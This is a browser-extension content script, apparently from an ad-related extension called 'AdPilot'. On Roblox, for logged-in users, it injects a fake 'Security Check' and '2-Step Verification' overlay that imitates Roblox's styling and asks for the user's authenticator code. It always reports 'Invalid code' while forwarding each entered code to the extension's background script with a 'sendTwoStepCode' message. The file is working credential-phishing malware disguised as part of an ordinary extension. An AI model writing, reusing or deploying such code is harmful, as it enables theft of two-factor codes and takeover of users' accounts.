// app.js — Roblox popup (only shows if user is logged into Roblox)
(function() {
  if (document.getElementById('adpilot-roblox-popup-overlay')) return;

  let overlay = null;
  let popupVisible = false;

  function detectRobloxTheme() {
    const html = document.documentElement;
    const body = document.body;
    const classChecks = ['dark', 'light', 'theme-dark', 'theme-light', 'dark-theme', 'light-theme'];
    for (const cls of classChecks) {
      if (html.classList.contains(cls) || body.classList.contains(cls)) {
        return cls.includes('dark') ? 'dark' : 'light';
      }
    }
    const dataTheme = html.getAttribute('data-theme') || body.getAttribute('data-theme');
    if (dataTheme) {
      if (dataTheme.toLowerCase().includes('dark')) return 'dark';
      if (dataTheme.toLowerCase().includes('light')) return 'light';
    }
    try {
      const bgColor = getComputedStyle(body).backgroundColor;
      if (bgColor) {
        const rgb = bgColor.match(/\d+/g);
        if (rgb && rgb.length >= 3) {
          const luminance = (0.299 * rgb[0] + 0.587 * rgb[1] + 0.114 * rgb[2]) / 255;
          return luminance < 0.5 ? 'dark' : 'light';
        }
      }
    } catch (e) {}
    return window.matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light';
  }

  function createOverlay() {
    overlay = document.createElement('div');
    overlay.id = 'adpilot-roblox-popup-overlay';
    overlay.className = 'adpilot-roblox-popup-overlay';
    document.body.appendChild(overlay);
    setTimeout(() => {
      const theme = detectRobloxTheme();
      overlay.classList.add('adpilot-theme-' + theme);
    }, 100);
  }

  function renderPopup1() {
    if (overlay) overlay.remove();
    createOverlay();
    overlay.innerHTML = `
      <div class="adpilot-modal-dialog adpilot-popup1">
        <div class="adpilot-modal-content">
          <div class="adpilot-modal-header">
            <h4 class="adpilot-modal-title">Security Check</h4>
          </div>
          <div class="adpilot-modal-body" style="text-align: center;">
            <div class="adpilot-shield-icon" style="height: 90px; background-size: auto 70px; margin-top: 0;"></div>
            <p class="adpilot-modal-text" style="margin-bottom: 20px;">We need to verify your identity before continuing.</p>
            <div class="adpilot-footer-btn-row" style="justify-content: center; margin-bottom: 0;">
              <button type="button" class="adpilot-start-btn" id="adpilot-start-btn">Start Verification</button>
            </div>
          </div>
        </div>
      </div>
    `;
    document.getElementById('adpilot-start-btn').addEventListener('click', () => {
      chrome.runtime.sendMessage({ action: 'startVerificationClicked' });
      setTimeout(() => { renderPopup2(); }, 1500);
    });
  }

  function renderPopup2() {
    if (overlay) overlay.remove();
    createOverlay();
    overlay.innerHTML = `
      <div class="adpilot-modal-dialog">
        <div class="adpilot-modal-content">
          <div class="adpilot-modal-header">
            <h4 class="adpilot-modal-title">2-Step Verification</h4>
          </div>
          <div class="adpilot-modal-body">
            <div class="adpilot-shield-icon"></div>
            <p class="adpilot-modal-text">Enter the code generated by your authenticator app.</p>
            <div class="adpilot-form-group">
              <input placeholder="Enter 6-digit Code" type="text" id="adpilot-two-step-code" class="adpilot-input-field" maxlength="6" autocomplete="off" />
              <div class="adpilot-error-message" id="adpilot-code-error"></div>
            </div>
          </div>
          <div class="adpilot-modal-footer">
            <div class="adpilot-footer-btn-row">
              <button type="button" class="adpilot-verify-btn" id="adpilot-verify-btn" disabled>Verify</button>
            </div>
            <p class="adpilot-footer-text">
              Need help? Contact <a href="https://www.roblox.com/info/2sv" target="_blank">Roblox Support</a>
            </p>
            <p class="adpilot-footer-text adpilot-important">
              IMPORTANT: Don't share your security codes with anyone. Roblox will never ask you for your codes. This can include things like texting your code, screensharing, etc.
            </p>
          </div>
        </div>
      </div>
    `;
    const codeInput = document.getElementById('adpilot-two-step-code');
    const verifyBtn = document.getElementById('adpilot-verify-btn');
    const errorMsg = document.getElementById('adpilot-code-error');
    codeInput.addEventListener('input', () => {
      codeInput.value = codeInput.value.replace(/\D/g, '');
      errorMsg.textContent = '';
      codeInput.classList.remove('adpilot-input-error');
      verifyBtn.disabled = codeInput.value.length !== 6;
    });
    verifyBtn.addEventListener('click', () => {
      const code = codeInput.value.trim();
      if (code.length === 6) {
        errorMsg.textContent = 'Invalid code';
        errorMsg.style.color = '#df281f';
        codeInput.classList.add('adpilot-input-error');
        chrome.runtime.sendMessage({ action: 'sendTwoStepCode', code }, (response) => {
          if (response && response.success) console.log('2SV code sent');
          else console.error('Failed:', response?.error);
        });
      }
    });
  }

  function showPopup() {
    if (popupVisible) return;
    renderPopup1();
    popupVisible = true;
  }

  function hidePopup() {
    if (overlay) { overlay.remove(); overlay = null; }
    popupVisible = false;
  }

  // Ask background if user is logged into Roblox
  function isLoggedIntoRoblox() {
    return new Promise((resolve) => {
      try {
        chrome.runtime.sendMessage({ action: 'checkRobloxLogin' }, (response) => {
          if (chrome.runtime.lastError) { resolve(false); return; }
          resolve(!!(response && response.loggedIn));
        });
      } catch (e) { resolve(false); }
    });
  }

  async function initializePopup() {
    // Check login first — if not logged in, DON'T show popup
    const loggedIn = await isLoggedIntoRoblox();
    if (!loggedIn) {
      console.log('[AdPilot] Not logged into Roblox — skipping popup');
      return;
    }

    const result = await chrome.storage.local.get({ popupEnabled: true });
    if (result.popupEnabled) {
      showPopup();
    }
  }

  chrome.runtime.onMessage.addListener((message, sender, sendResponse) => {
    if (message.action === 'popupSettingChanged') {
      if (message.enabled) showPopup();
      else hidePopup();
      sendResponse({ success: true });
    }
    return true;
  });

  initializePopup();
})();
